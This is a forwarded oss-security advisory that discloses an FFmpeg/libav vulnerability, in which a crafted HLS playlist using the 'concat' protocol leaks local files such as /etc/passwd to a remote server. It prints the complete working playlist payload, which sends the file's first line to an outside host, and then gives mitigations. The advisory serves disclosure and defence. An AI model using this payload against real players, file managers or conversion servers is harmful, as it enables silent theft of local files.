Fwd: FFmpeg: stealing local files with HLS+concat

[Vladimir Dubrovin <vlad () securityvulns ru>]

---------- Forwarded message ----------
From: Максим Андреев <andreevmaxim () gmail com>
Date: 13 January 2016 at 13:41
Subject: FFmpeg: stealing local files with HLS+concat
To: oss-security () lists openwall com


Hello!
I found some strange behavior in ffmpeg which can lead to stealing local
files during ffmpeg/ffprobe exec, it's also applied to libav.

I've underestimated the impact of this bug, so it was full disclosured
in this article (Russian language, but google translate works fine with
it) - http://habrahabr.ru/company/mailru/blog/274855


In short:
if linux user download specially prepared video file (with any
extension: avi/mov/etc..) which contains HLS m3u8 playlist with "concat"
protocol in url:,
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://dx.su/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST

header.m3u8:
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://example.org?

If user launches ffmpeg-based video player (MPlayer, etc..), first line
of /etc/passwd will be sent to http://example.org? in
http://example.org?# $FreeBSD: release/100.0/et..  request.
The same happens when file manager tries to generate thumbnail for this
file.

All this can be applied to server-run ffmpeg during video conversion.
FFmpeg/libav security teams are already notified, but official patches
are not available yet, so you can rebuild ffmpeg with --disable-network
configure option which prevents this vulnerability from being exploited.

Moreover, it's always recommended to run ffmpeg in isolated environment
when processing untrusted files
(googleonlinesecurity.blogspot.ru/2014/01/ffmpeg-and-thousand-fixes.html)

-- 
Maxim Andreev